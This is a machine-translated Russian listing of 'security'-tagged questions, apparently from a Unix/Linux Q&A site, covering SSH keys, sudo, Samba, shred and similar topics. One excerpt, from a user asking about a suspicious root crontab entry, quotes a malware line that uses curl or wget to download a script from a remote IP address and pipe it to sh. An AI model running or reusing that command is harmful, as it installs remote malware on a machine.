Вопросы с тегом «security»

Согласно статье rapid7, существует несколько уязвимых версий Samba, позволяющих удаленно выполнять код в системах Linux: В то время как вымогатель WannaCry воздействовал на системы Windows и был легко идентифицируемым, с четкими шагами по исправлению, уязвимость Samba затронет системы Linux и Unix и может создать значительные технические препятствия для получения или …

73 linux  security  linux-kernel  samba 

Я должен получить доступ к серверу, чтобы связать промежуточные и живые серверы компании в наш цикл развертывания. Администратор со своей стороны установил два экземпляра, а затем создал пользователя на сервере для нас в SSH в качестве. Это то, к чему я привык. Теперь я думаю, что произойдет, я отправлю им …

73 ssh  security  key-authentication  administration 

Моя машина - это сервер, поэтому я хочу игнорировать соединения с моим сервером (например, когда кто-то заходит на мой сайт). Я хочу видеть только соединения / запросы, сделанные моим сервером в другие места. Как я вижу только эти исходящие соединения? РЕДАКТИРОВАТЬ: я новичок в такого рода вещи. То, что я …

71 command-line  networking  shell-script  security 

Некоторое время назад я заметил, что имена пользователей и пароли, заданные в curlкачестве аргументов командной строки, не отображаются в psвыходных данных (хотя, конечно, они могут появляться в вашей истории bash). Они также не появляются в /proc/PID/cmdline. (Длина объединенного аргумента имя пользователя / пароль может быть получена, хотя.) Демонстрация ниже: [root@localhost …

68 security  password  curl  ps  arguments 

У нас небольшая проблема на сервере. Мы хотим, чтобы некоторые пользователи могли делать, например, sudoи становиться root, но с ограничением, что пользователь не может изменить пароль root. То есть гарантия того, что мы все еще можем войти на этот сервер и стать пользователем root независимо от того, что будут делать …

66 ubuntu  security  sudo 

Есть ли способ предотвратить добавление команды в вашу историю? У меня есть команда, которую я хочу сохранить в своем файле истории, и я действительно не хочу, чтобы она была там при поиске истории, хранящейся в памяти, хотя это не так важно. Есть ли способ предотвратить это, или мне просто нужно …

65 bash  security  zsh  command-history 

В настоящее время я работаю удаленно для ряда организаций, которым требуется регулярный доступ к их серверам для обслуживания и обновлений. Безопасно ли для меня добавить свой открытый SSH-ключ RSA в .ssh/authorized_keysфайл, чтобы я мог войти намного быстрее / без необходимости поиска паролей? Я действую в предположении, что было бы невозможно …

60 ssh  security  key-authentication 

Я пытаюсь переместить некоторые папки (например, /varи /home) в отдельный раздел после прочтения этого руководства: 3.2.1 Выберите интеллектуальную схему разделов Мне удалось переместить одну папку успешно, следуя этому руководству. Тем не менее, это не работает для нескольких папок, и все мои папки сбрасываются в раздел без надлежащих папок. Я хотел …

59 debian  security  partition  fstab 

Я хотел добавить что-то в мой корневой файл crontab на Raspberry Pi и нашел запись, которая мне кажется подозрительной, поиск ее частей в Google ничего не дал. Запись в Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Содержание http://103.219.112.66:8000/i.sh: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir …

59 security  cron  malware 

Я использую Chromium так: chromium --no-sandbox Я делаю это потому, что запускаю Debian Squeeze на виртуальном контейнере OpenVZ, и это единственный способ заставить его работать. Хотя я продолжаю читать это ужасно . Но я хочу знать, почему именно. Может кто-нибудь, пожалуйста, объясните мне это? Кто-то должен взломать ваш компьютер, чтобы …

54 security  chrome  browser  sandbox 

Это более праздное любопытство, чем все остальное. Мой друг спросил меня: «Какой диапазон портов может использовать только Linux в Linux?» Я сказал ему, что 0-1024 были ограничены. Затем он спросил, почему это так и ... я растерялся. Понятия не имею. Есть ли причина, по которой эти порты ограничены, а 1025-65535 …

53 networking  security  root  tcp 

Мой файл .muttrc выглядит как этот или увидеть ниже проблеск. Я не решаюсь с паролем. Как я должен хранить свой пароль, чтобы использовать его с mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your …

52 security  mutt 

Я сгенерировал и загрузил закрытый .pemключ от AWS. Однако, чтобы использовать Putty для подключения к виртуальной машине, у меня должен быть этот ключ в .ppkформате. Процесс преобразования подробно описан здесь примерно в 20 строках: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Я использую Linux Mint (дистрибутив Ubuntu) и знаю, что могу использовать puttygen в терминале. Тем …

49 ssh  linux-mint  security  putty  amazon-ec2 

У меня есть дерево каталогов, которое я хотел бы уничтожить с помощью утилиты Linux 'shred'. К сожалению, -Rу уничтожения нет возможности рекурсивного уничтожения. Как я могу рекурсивно уничтожить целое дерево каталогов?

48 security  rm  data-destruction 

У меня есть процесс, который прослушивает 2 порта: 45136 / tcp и 37208 / udp (на самом деле я предполагаю, что это тот же процесс). Но netstat не возвращает pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Тот же результат с "grep 37208". Я тоже …

47 networking  security  process